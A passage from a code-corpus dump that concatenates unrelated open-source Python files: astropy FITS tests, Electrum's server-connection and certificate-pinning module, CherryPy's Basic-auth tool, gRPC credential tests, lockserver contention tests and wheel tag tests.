    ccd_data.mask = ccd_data.data > 10
    filename = tmpdir.join('afile.fits').strpath
    ccd_data.write(filename)
    ccd_after = CCDData.read(filename)
    assert ccd_after.mask is not None
    np.testing.assert_array_equal(ccd_data.mask, ccd_after.mask)
def test_write_read_multiextensionfits_uncertainty_default(ccd_data, tmpdir):
    # Test that if a uncertainty is present it is saved and loaded by default.
    ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
    filename = tmpdir.join('afile.fits').strpath
    ccd_data.write(filename)
    ccd_after = CCDData.read(filename)
    assert ccd_after.uncertainty is not None
    np.testing.assert_array_equal(ccd_data.uncertainty.array,
                                  ccd_after.uncertainty.array)
def test_write_read_multiextensionfits_not(ccd_data, tmpdir):
    # Test that writing mask and uncertainty can be disabled
    ccd_data.mask = ccd_data.data > 10
    ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
    filename = tmpdir.join('afile.fits').strpath
    ccd_data.write(filename, hdu_mask=None, hdu_uncertainty=None)
    ccd_after = CCDData.read(filename)
    assert ccd_after.uncertainty is None
    assert ccd_after.mask is None
def test_write_read_multiextensionfits_custom_ext_names(ccd_data, tmpdir):
    # Test writing mask, uncertainty in another extension than default
    ccd_data.mask = ccd_data.data > 10
    ccd_data.uncertainty = StdDevUncertainty(ccd_data.data * 10)
    filename = tmpdir.join('afile.fits').strpath
    ccd_data.write(filename, hdu_mask='Fun', hdu_uncertainty='NoFun')
    # Try reading with defaults extension names
    ccd_after = CCDData.read(filename)
    assert ccd_after.uncertainty is None
    assert ccd_after.mask is None
    # Try reading with custom extension names
    ccd_after = CCDData.read(filename, hdu_mask='Fun', hdu_uncertainty='NoFun')
    assert ccd_after.uncertainty is not None
    assert ccd_after.mask is not None
    np.testing.assert_array_equal(ccd_data.mask, ccd_after.mask)
    np.testing.assert_array_equal(ccd_data.uncertainty.array,
                                  ccd_after.uncertainty.array)
def test_wcs(ccd_data):
    """The ``wcs`` attribute must round-trip a plain assigned value."""
    sentinel = 5
    ccd_data.wcs = sentinel
    assert ccd_data.wcs == sentinel
def test_recognized_fits_formats_for_read_write(ccd_data, tmpdir):
    """All three conventional FITS file extensions must round-trip."""
    # These are the extensions that are supposed to be supported.
    supported_extensions = ['fit', 'fits', 'fts']
    for ext in supported_extensions:
        path = tmpdir.join("test.{}".format(ext))
        ccd_data.write(path.strpath)
        from_disk = CCDData.read(path.strpath)
        assert (ccd_data.data == from_disk.data).all()
def test_stddevuncertainty_compat_descriptor_no_parent():
    """Accessing ``parent_nddata`` with no parent set must raise."""
    with pytest.raises(MissingDataAssociationException):
        StdDevUncertainty(np.ones((10, 10))).parent_nddata
def test_stddevuncertainty_compat_descriptor_no_weakref():
    # TODO: Remove this test if astropy 1.0 isn't supported anymore
    # This test might create a Memoryleak on purpose, so the last lines after
    # the assert are IMPORTANT cleanup.
    ccd = CCDData(np.ones((10, 10)), unit='')
    uncert = StdDevUncertainty(np.ones((10, 10)))
    uncert._parent_nddata = ccd
    assert uncert.parent_nddata is ccd
    uncert._parent_nddata = None
|
MrChoclate/tripping_sansa | refs/heads/master | api/__init__.py | 12133432 | |
ThiagoGarciaAlves/intellij-community | refs/heads/master | python/lib/Lib/site-packages/django/conf/locale/en_GB/__init__.py | 12133432 | |
samliu/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/pywebsocket/src/test/__init__.py | 12133432 | |
shaistaansari/django | refs/heads/master | tests/known_related_objects/__init__.py | 12133432 | |
toke/django-tastypie | refs/heads/master | tests/slashless/api/__init__.py | 12133432 | |
protonn/Electrum-Cash | refs/heads/master | lib/interface.py | 1 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import re
import socket
import ssl
import sys
import threading
import time
import traceback
import requests
ca_path = requests.certs.where()
import util
import x509
import pem
def Connection(server, queue, config_path):
    """Makes asynchronous connections to a remote electrum server.
    Returns the running thread that is making the connection.
    Once the thread has connected, it finishes, placing a tuple on the
    queue of the form (server, socket), where socket is None if
    connection failed.
    """
    # Server strings look like "host:port:protocol"; only 's' (SSL) and
    # 't' (plain TCP) are valid protocols.
    _, _, protocol = server.split(':')
    if protocol not in 'st':
        raise Exception('Unknown protocol: %s' % protocol)
    thread = TcpConnection(server, queue, config_path)
    thread.start()
    return thread
class TcpConnection(threading.Thread, util.PrintError):
    """Daemon thread that opens one (optionally SSL-wrapped) socket to a
    server and reports the outcome on a queue as ``(server, socket)``.

    NOTE(review): this module uses Python 2 syntax (``except X, e``,
    ``dict.has_key``); it will not run under Python 3 as-is.
    """
    def __init__(self, server, queue, config_path):
        threading.Thread.__init__(self)
        self.config_path = config_path
        self.queue = queue
        self.server = server
        # server string format is "host:port:protocol".
        self.host, self.port, self.protocol = self.server.split(':')
        self.host = str(self.host)
        self.port = int(self.port)
        # 's' selects SSL; anything else (validated by Connection) is plain TCP.
        self.use_ssl = (self.protocol == 's')
        self.daemon = True
    def diagnostic_name(self):
        # Used by util.PrintError to prefix this thread's log output.
        return self.host
    def check_host_name(self, peercert, name):
        """Simple certificate/host name checker. Returns True if the
        certificate matches, False otherwise. Does not support
        wildcards."""
        # Check that the peer has supplied a certificate.
        # None/{} is not acceptable.
        if not peercert:
            return False
        if peercert.has_key("subjectAltName"):
            for typ, val in peercert["subjectAltName"]:
                if typ == "DNS" and val == name:
                    return True
        else:
            # Only check the subject DN if there is no subject alternative
            # name.
            cn = None
            for attr, val in peercert["subject"]:
                # Use most-specific (last) commonName attribute.
                if attr == "commonName":
                    cn = val
            if cn is not None:
                return cn == name
        return False
    def get_simple_socket(self):
        # Resolve the host and try each returned address in turn;
        # return the first TCP socket that connects.
        try:
            l = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
        except socket.gaierror:
            self.print_error("cannot resolve hostname")
            return
        for res in l:
            try:
                s = socket.socket(res[0], socket.SOCK_STREAM)
                # Generous timeout for connect, short timeout afterwards.
                s.settimeout(10)
                s.connect(res[4])
                s.settimeout(2)
                s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
                return s
            except BaseException as e:
                continue
        else:
            # for-else: runs only when every address failed; ``e`` holds
            # the last failure.
            self.print_error("failed to connect", str(e))
    def get_socket(self):
        # Trust-on-first-use certificate pinning: on the first SSL contact
        # the server certificate is saved under certs/<host>; later
        # connections must present the same certificate (unless the server
        # certificate validates against the system CA bundle).
        if self.use_ssl:
            cert_path = os.path.join(self.config_path, 'certs', self.host)
            if not os.path.exists(cert_path):
                is_new = True
                s = self.get_simple_socket()
                if s is None:
                    return
                # try with CA first
                try:
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_REQUIRED, ca_certs=ca_path, do_handshake_on_connect=True)
                except ssl.SSLError, e:
                    s = None
                if s and self.check_host_name(s.getpeercert(), self.host):
                    self.print_error("SSL certificate signed by CA")
                    return s
                # get server certificate.
                # Do not use ssl.get_server_certificate because it does not work with proxy
                s = self.get_simple_socket()
                if s is None:
                    return
                try:
                    s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23, cert_reqs=ssl.CERT_NONE, ca_certs=None)
                except ssl.SSLError, e:
                    self.print_error("SSL error retrieving SSL certificate:", e)
                    return
                dercert = s.getpeercert(True)
                s.close()
                cert = ssl.DER_cert_to_PEM_cert(dercert)
                # workaround android bug
                cert = re.sub("([^\n])-----END CERTIFICATE-----","\\1\n-----END CERTIFICATE-----",cert)
                # Save to a .temp file first; only renamed to the pinned
                # path after a successful verified handshake below.
                temporary_path = cert_path + '.temp'
                with open(temporary_path,"w") as f:
                    f.write(cert)
            else:
                is_new = False
        s = self.get_simple_socket()
        if s is None:
            return
        if self.use_ssl:
            try:
                # Verify the peer against the pinned (or just-fetched) cert.
                s = ssl.wrap_socket(s,
                                    ssl_version=ssl.PROTOCOL_SSLv23,
                                    cert_reqs=ssl.CERT_REQUIRED,
                                    ca_certs= (temporary_path if is_new else cert_path),
                                    do_handshake_on_connect=True)
            except ssl.SSLError, e:
                self.print_error("SSL error:", e)
                # errno 1: certificate verify failed (mismatch with pin).
                if e.errno != 1:
                    return
                if is_new:
                    # Keep the rejected certificate for inspection.
                    rej = cert_path + '.rej'
                    if os.path.exists(rej):
                        os.unlink(rej)
                    os.rename(temporary_path, rej)
                else:
                    with open(cert_path) as f:
                        cert = f.read()
                    try:
                        b = pem.dePem(cert, 'CERTIFICATE')
                        x = x509.X509(b)
                    except:
                        traceback.print_exc(file=sys.stderr)
                        self.print_error("wrong certificate")
                        return
                    try:
                        x.check_date()
                    except:
                        # Expired pin: drop it so the next attempt re-pins.
                        self.print_error("certificate has expired:", cert_path)
                        os.unlink(cert_path)
                        return
                    self.print_error("wrong certificate")
                return
            except BaseException, e:
                self.print_error(e)
                # errno 104: connection reset by peer.
                if e.errno == 104:
                    return
                traceback.print_exc(file=sys.stderr)
                return
            if is_new:
                # Handshake succeeded against the fetched cert: pin it.
                self.print_error("saving certificate")
                os.rename(temporary_path, cert_path)
        return s
    def run(self):
        # Thread body: attempt the connection once and report the result.
        socket = self.get_socket()
        if socket:
            self.print_error("connected")
        self.queue.put((self.server, socket))
class Interface(util.PrintError):
"""The Interface class handles a socket connected to a single remote
electrum server. It's exposed API is:
- Member functions close(), fileno(), get_responses(), has_timed_out(),
ping_required(), queue_request(), send_requests()
- Member variable server.
"""
def __init__(self, server, socket):
self.server = server
self.host, _, _ = server.split(':')
self.socket = socket
self.pipe = util.SocketPipe(socket)
self.pipe.set_timeout(0.0) # Don't wait for data
# Dump network messages. Set at runtime from the console.
self.debug = False
self.unsent_requests = []
self.unanswered_requests = {}
# Set last ping to zero to ensure immediate ping
self.last_request = time.time()
self.last_ping = 0
self.closed_remotely = False
def diagnostic_name(self):
return self.host
def fileno(self):
# Needed for select
return self.socket.fileno()
def close(self):
if not self.closed_remotely:
try:
self.socket.shutdown(socket.SHUT_RDWR)
except socket.error:
pass
self.socket.close()
def queue_request(self, *args): # method, params, _id
'''Queue a request, later to be send with send_requests when the
socket is available for writing.
'''
self.request_time = time.time()
self.unsent_requests.append(args)
def num_requests(self):
'''Keep unanswered requests below 100'''
n = 100 - len(self.unanswered_requests)
return min(n, len(self.unsent_requests))
def send_requests(self):
'''Sends queued requests. Returns False on failure.'''
make_dict = lambda (m, p, i): {'method': m, 'params': p, 'id': i}
n = self.num_requests()
wire_requests = self.unsent_requests[0:n]
try:
self.pipe.send_all(map(make_dict, wire_requests))
except socket.error, e:
self.print_error("socket error:", e)
return False
self.unsent_requests = self.unsent_requests[n:]
for request in wire_requests:
if self.debug:
self.print_error("-->", request)
self.unanswered_requests[request[2]] = request
return True
def ping_required(self):
'''Maintains time since last ping. Returns True if a ping should
be sent.
'''
now = time.time()
if now - self.last_ping > 60:
self.last_ping = now
return True
return False
def has_timed_out(self):
'''Returns True if the interface has timed out.'''
if (self.unanswered_requests and time.time() - self.request_time > 10
and self.pipe.idle_time() > 10):
self.print_error("timeout", len(self.unanswered_requests))
return True
return False
    def get_responses(self):
        '''Call if there is data available on the socket. Returns a list of
        (request, response) pairs. Notifications are singleton
        unsolicited responses presumably as a result of prior
        subscriptions, so request is None and there is no 'id' member.
        Otherwise it is a response, which has an 'id' member and a
        corresponding request. If the connection was closed remotely
        or the remote server is misbehaving, a (None, None) will appear.
        '''
        responses = []
        while True:
            try:
                response = self.pipe.get()
            except util.timeout:
                # No complete message buffered; return without blocking.
                break
            if response is None:
                # EOF: the peer closed the connection.
                responses.append((None, None))
                self.closed_remotely = True
                self.print_error("connection closed remotely")
                break
            if self.debug:
                self.print_error("<--", response)
            wire_id = response.get('id', None)
            if wire_id is None:  # Notification
                responses.append((None, response))
            else:
                request = self.unanswered_requests.pop(wire_id, None)
                if request:
                    responses.append((request, response))
                else:
                    # Response to a request we never sent: treat the server
                    # as misbehaving and signal with (None, None).
                    self.print_error("unknown wire ID", wire_id)
                    responses.append((None, None))  # Signal
                    break
        return responses
def check_cert(host, cert):
    """Parse a PEM certificate and print its host and expiry status.

    Parsing failures are reported with a traceback and the function
    returns silently; a certificate whose validity dates cannot be
    verified is reported as expired.
    """
    try:
        b = pem.dePem(cert, 'CERTIFICATE')
        x = x509.X509(b)
    except Exception:
        # Was a bare "except:", which would also swallow SystemExit and
        # KeyboardInterrupt; catch only real errors.
        traceback.print_exc(file=sys.stdout)
        return

    try:
        x.check_date()
        expired = False
    except Exception:
        # check_date() raising means the certificate is outside its
        # validity window (or the dates could not be verified).
        expired = True

    m = "host: %s\n" % host
    m += "has_expired: %s\n" % expired
    util.print_msg(m)
# Used by tests
def _match_hostname(name, val):
if val == name:
return True
return val.startswith('*.') and name.endswith(val[1:])
def test_certificates():
    """Run check_cert() over every certificate cached in the config
    directory's "certs" subdirectory (manual smoke test)."""
    from simple_config import SimpleConfig
    config = SimpleConfig()
    mydir = os.path.join(config.path, "certs")
    certs = os.listdir(mydir)
    for c in certs:
        print c
        p = os.path.join(mydir, c)
        with open(p) as f:
            cert = f.read()
        check_cert(c, cert)
if __name__ == "__main__":
    # Manual smoke test: validate all locally cached certificates.
    test_certificates()
|
mrroach/CentralServer | refs/heads/master | csrv/model/actions/make_a_run_action.py | 1 | """Base actions for the players to take."""
from csrv.model.actions import action
from csrv.model import cost
from csrv.model import errors
from csrv.model import events
from csrv.model import game_object
from csrv.model import parameters
class MakeARunAction(action.Action):
  """Action with which the runner initiates a run against a server."""

  DESCRIPTION = 'Make a run.'
  COST_CLASS = cost.MakeARunCost

  def __init__(self, game, player, server):
    """Store the targeted server on top of the base action state."""
    action.Action.__init__(self, game, player)
    self.server = server

  @property
  def description(self):
    # Human-readable form naming the concrete server being run on.
    return 'Make a run on %s' % self.server

  def __str__(self):
    return self.description

  def resolve(self, response=None, ignore_clicks=False, ignore_all_costs=False):
    """Pay costs via the base class, then create and begin the run."""
    action.Action.resolve(
        self,
        ignore_clicks=ignore_clicks,
        ignore_all_costs=ignore_all_costs)
    self.game.log('The runner makes a run on %s' % self.server)
    self.game.new_run(self.server).begin()
|
deepaklukose/grpc | refs/heads/master | src/python/grpcio_tests/tests/unit/beta/_implementations_test.py | 29 | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests the implementations module of the gRPC Python Beta API."""
import datetime
import unittest
from oauth2client import client as oauth2client_client
from grpc.beta import implementations
from tests.unit import resources
class ChannelCredentialsTest(unittest.TestCase):
    """Sanity checks for implementations.ssl_channel_credentials()."""

    def test_runtime_provided_root_certificates(self):
        # No explicit roots: gRPC falls back to its default root certificates.
        channel_credentials = implementations.ssl_channel_credentials()
        self.assertIsInstance(channel_credentials,
                              implementations.ChannelCredentials)

    def test_application_provided_root_certificates(self):
        # Explicit application-supplied root certificates.
        channel_credentials = implementations.ssl_channel_credentials(
            resources.test_root_certificates())
        self.assertIsInstance(channel_credentials,
                              implementations.ChannelCredentials)
class CallCredentialsTest(unittest.TestCase):
    """Sanity checks for the beta call-credentials constructors."""

    def test_google_call_credentials(self):
        # Wrap an oauth2client credentials object; values are dummies.
        creds = oauth2client_client.GoogleCredentials(
            'token', 'client_id', 'secret', 'refresh_token',
            datetime.datetime(2008, 6, 24), 'https://refresh.uri.com/',
            'user_agent')
        call_creds = implementations.google_call_credentials(creds)
        self.assertIsInstance(call_creds, implementations.CallCredentials)

    def test_access_token_call_credentials(self):
        call_creds = implementations.access_token_call_credentials('token')
        self.assertIsInstance(call_creds, implementations.CallCredentials)
if __name__ == '__main__':
    # Verbose output so individual test names are listed.
    unittest.main(verbosity=2)
|
sburnett/seattle | refs/heads/master | seattlegeni/lockserver/tests/unit/single_lock_contention.py | 4 | import unittest
import lockserver_daemon as lockserver
class TheTestCase(unittest.TestCase):
    """Exercises FIFO lock contention between multiple lockserver sessions."""

    def setUp(self):
        # Reset the lockserver's global variables between each test.
        lockserver.init_globals()

    def testContentionForSingleUserLock(self):
        """Three sessions contend for one user lock; FIFO queueing expected."""
        # This entire test will use this same lockdict in each request
        locks = {'user': ['bob']}

        # Start three sessions.
        sess = []
        sess.append(lockserver.do_start_session())
        sess.append(lockserver.do_start_session())
        sess.append(lockserver.do_start_session())

        # Have all three session try to acquire a lock on a single user.
        lockserver.do_acquire_locks(sess[0], locks)
        lockserver.do_acquire_locks(sess[1], locks)
        lockserver.do_acquire_locks(sess[2], locks)

        # The first session should have the lock and the other two sessions should
        # be queued in order for that lock.
        expected_heldlockdict = {
            'node': {},
            'user': {'bob': {'locked_by_session': sess[0],
                             'queue': [sess[1], sess[2]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'node': [], 'user': ['bob']},
                      'neededlocks': {'node': [], 'user': []},
                      'acquirelocksproceedeventset': True},
            sess[1]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': ['bob']},
                      'acquirelocksproceedeventset': False},
            sess[2]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': ['bob']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])

        # Have the session that holds the lock release it.
        lockserver.do_release_locks(sess[0], locks)

        # Ownership should pass to the next queued session (FIFO order).
        expected_heldlockdict = {
            'node': {},
            'user': {'bob': {'locked_by_session': sess[1],
                             'queue': [sess[2]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': []},
                      'acquirelocksproceedeventset': True},
            sess[1]: {'heldlocks': {'node': [], 'user': ['bob']},
                      'neededlocks': {'node': [], 'user': []},
                      'acquirelocksproceedeventset': True},
            sess[2]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': ['bob']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])

        # The session that just released it tries to acquire it again.
        lockserver.do_acquire_locks(sess[0], locks)

        # It should rejoin at the back of the queue, not jump ahead.
        expected_heldlockdict = {
            'node': {},
            'user': {'bob': {'locked_by_session': sess[1],
                             'queue': [sess[2], sess[0]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': ['bob']},
                      'acquirelocksproceedeventset': False},
            sess[1]: {'heldlocks': {'node': [], 'user': ['bob']},
                      'neededlocks': {'node': [], 'user': []},
                      'acquirelocksproceedeventset': True},
            sess[2]: {'heldlocks': {'node': [], 'user': []},
                      'neededlocks': {'node': [], 'user': ['bob']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])

    def testContentionForSingleNodeLock(self):
        """
        This is the same as testContentionForSingleUserLock but involves contention
        over a single node lock rather than over a single user lock. Both could have
        been done with much less code using a helper method, but that makes the
        dictionaries of expected data much less intuitive to look at and thus
        makes the tests hard to understand. So, just duplicating code, instead.
        """
        # This entire test will use this same lockdict in each request
        locks = {'node': ['123']}

        # Start three sessions.
        sess = []
        sess.append(lockserver.do_start_session())
        sess.append(lockserver.do_start_session())
        sess.append(lockserver.do_start_session())

        # Have all three session try to acquire a lock on a single user.
        lockserver.do_acquire_locks(sess[0], locks)
        lockserver.do_acquire_locks(sess[1], locks)
        lockserver.do_acquire_locks(sess[2], locks)

        # The first session should have the lock and the other two sessions should
        # be queued in order for that lock.
        expected_heldlockdict = {
            'user': {},
            'node': {'123': {'locked_by_session': sess[0],
                             'queue': [sess[1], sess[2]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'user': [], 'node': ['123']},
                      'neededlocks': {'user': [], 'node': []},
                      'acquirelocksproceedeventset': True},
            sess[1]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': ['123']},
                      'acquirelocksproceedeventset': False},
            sess[2]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': ['123']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])

        # Have the session that holds the lock release it.
        lockserver.do_release_locks(sess[0], locks)

        # Ownership should pass to the next queued session (FIFO order).
        expected_heldlockdict = {
            'user': {},
            'node': {'123': {'locked_by_session': sess[1],
                             'queue': [sess[2]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': []},
                      'acquirelocksproceedeventset': True},
            sess[1]: {'heldlocks': {'user': [], 'node': ['123']},
                      'neededlocks': {'user': [], 'node': []},
                      'acquirelocksproceedeventset': True},
            sess[2]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': ['123']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])

        # The session that just released it tries to acquire it again.
        lockserver.do_acquire_locks(sess[0], locks)

        # It should rejoin at the back of the queue, not jump ahead.
        expected_heldlockdict = {
            'user': {},
            'node': {'123': {'locked_by_session': sess[1],
                             'queue': [sess[2], sess[0]]}}}
        expected_sessiondict = {
            sess[0]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': ['123']},
                      'acquirelocksproceedeventset': False},
            sess[1]: {'heldlocks': {'user': [], 'node': ['123']},
                      'neededlocks': {'user': [], 'node': []},
                      'acquirelocksproceedeventset': True},
            sess[2]: {'heldlocks': {'user': [], 'node': []},
                      'neededlocks': {'user': [], 'node': ['123']},
                      'acquirelocksproceedeventset': False}}
        status = lockserver.do_get_status()
        self.assertEqual(expected_heldlockdict, status["heldlockdict"])
        self.assertEqual(expected_sessiondict, status["sessiondict"])
|
Hellowlol/PyTunes | refs/heads/master | libs/cherrypy/lib/auth_basic.py | 88 | # This file is part of CherryPy <http://www.cherrypy.org/>
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:expandtab:fileencoding=utf-8
__doc__ = """This module provides a CherryPy 3.x tool which implements
the server-side of HTTP Basic Access Authentication, as described in :rfc:`2617`.
Example usage, using the built-in checkpassword_dict function which uses a dict
as the credentials store::
userpassdict = {'bird' : 'bebop', 'ornette' : 'wayout'}
checkpassword = cherrypy.lib.auth_basic.checkpassword_dict(userpassdict)
basic_auth = {'tools.auth_basic.on': True,
'tools.auth_basic.realm': 'earth',
'tools.auth_basic.checkpassword': checkpassword,
}
app_config = { '/' : basic_auth }
"""
__author__ = 'visteya'
__date__ = 'April 2009'
import binascii
from cherrypy._cpcompat import base64_decode
import cherrypy
def checkpassword_dict(user_password_dict):
    """Returns a checkpassword function which checks credentials
    against a dictionary of the form: {username : password}.

    If you want a simple dictionary-based authentication scheme, use
    checkpassword_dict(my_credentials_dict) as the value for the
    checkpassword argument to basic_auth().
    """
    def checkpassword(realm, user, password):
        # Unknown users and falsy stored passwords both fail the check;
        # otherwise the supplied password must match the stored one.
        stored = user_password_dict.get(user)
        return bool(stored) and stored == password

    return checkpassword
def basic_auth(realm, checkpassword, debug=False):
    """A CherryPy tool which hooks at before_handler to perform
    HTTP Basic Access Authentication, as specified in :rfc:`2617`.

    If the request has an 'authorization' header with a 'Basic' scheme, this
    tool attempts to authenticate the credentials supplied in that header. If
    the request has no 'authorization' header, or if it does but the scheme is
    not 'Basic', or if authentication fails, the tool sends a 401 response with
    a 'WWW-Authenticate' Basic header.

    realm
        A string containing the authentication realm.

    checkpassword
        A callable which checks the authentication credentials.
        Its signature is checkpassword(realm, username, password). where
        username and password are the values obtained from the request's
        'authorization' header. If authentication succeeds, checkpassword
        returns True, else it returns False.
    """
    if '"' in realm:
        # The realm is echoed inside a quoted string in the 401 header.
        raise ValueError('Realm cannot contain the " (quote) character.')
    request = cherrypy.serving.request
    auth_header = request.headers.get('authorization')
    if auth_header is not None:
        try:
            scheme, params = auth_header.split(' ', 1)
            if scheme.lower() == 'basic':
                # Credentials are base64("username:password").
                username, password = base64_decode(params).split(':', 1)
                if checkpassword(realm, username, password):
                    if debug:
                        cherrypy.log('Auth succeeded', 'TOOLS.AUTH_BASIC')
                    request.login = username
                    return  # successful authentication
        except (ValueError, binascii.Error):  # split() error, base64.decodestring() error
            raise cherrypy.HTTPError(400, 'Bad Request')

    # Respond with 401 status and a WWW-Authenticate header
    cherrypy.serving.response.headers['www-authenticate'] = 'Basic realm="%s"' % realm
    raise cherrypy.HTTPError(401, "You are not authorized to access that resource")
|
bzennn/blog_flask | refs/heads/master | python/lib/python3.5/site-packages/wheel/test/test_tagopt.py | 326 | """
Tests for the bdist_wheel tag options (--python-tag, --universal, and
--plat-name)
"""
import sys
import shutil
import pytest
import py.path
import tempfile
import subprocess
SETUP_PY = """\
from setuptools import setup, Extension
setup(
name="Test",
version="1.0",
author_email="author@example.com",
py_modules=["test"],
{ext_modules}
)
"""
EXT_MODULES = "ext_modules=[Extension('_test', sources=['test.c'])],"
@pytest.fixture
def temp_pkg(request, ext=False):
    """Create a throwaway package directory containing setup.py and test.py.

    When *ext* is true the package also gets a C source file (test.c) and
    an ext_modules entry, so platform-specific wheels are built.  The
    directory is removed again when the requesting test finishes.
    """
    tempdir = tempfile.mkdtemp()

    def fin():
        shutil.rmtree(tempdir)
    request.addfinalizer(fin)
    temppath = py.path.local(tempdir)
    temppath.join('test.py').write('print("Hello, world")')
    if ext:
        temppath.join('test.c').write('#include <stdio.h>')
        setup_py = SETUP_PY.format(ext_modules=EXT_MODULES)
    else:
        setup_py = SETUP_PY.format(ext_modules='')
    temppath.join('setup.py').write(setup_py)
    return temppath
@pytest.fixture
def temp_ext_pkg(request):
    """Like temp_pkg, but the generated package contains a C extension."""
    return temp_pkg(request, ext=True)
def test_default_tag(temp_pkg):
    """Without options, a pure wheel is tagged pyN-none-any for the running major."""
    subprocess.check_call([sys.executable, 'setup.py', 'bdist_wheel'],
                          cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename == 'Test-1.0-py%s-none-any.whl' % (sys.version[0],)
    assert wheels[0].ext == '.whl'


def test_explicit_tag(temp_pkg):
    """--python-tag overrides the default python tag."""
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel', '--python-tag=py32'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py32-')
    assert wheels[0].ext == '.whl'


def test_universal_tag(temp_pkg):
    """--universal produces the combined py2.py3 tag."""
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel', '--universal'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
    assert wheels[0].ext == '.whl'


def test_universal_beats_explicit_tag(temp_pkg):
    """--universal wins when both it and --python-tag are supplied."""
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel', '--universal', '--python-tag=py32'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
    assert wheels[0].ext == '.whl'
def test_universal_in_setup_cfg(temp_pkg):
    """universal=1 in the [bdist_wheel] section of setup.cfg is honored."""
    temp_pkg.join('setup.cfg').write('[bdist_wheel]\nuniversal=1')
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
    assert wheels[0].ext == '.whl'


def test_pythontag_in_setup_cfg(temp_pkg):
    """python_tag in the [bdist_wheel] section of setup.cfg is honored."""
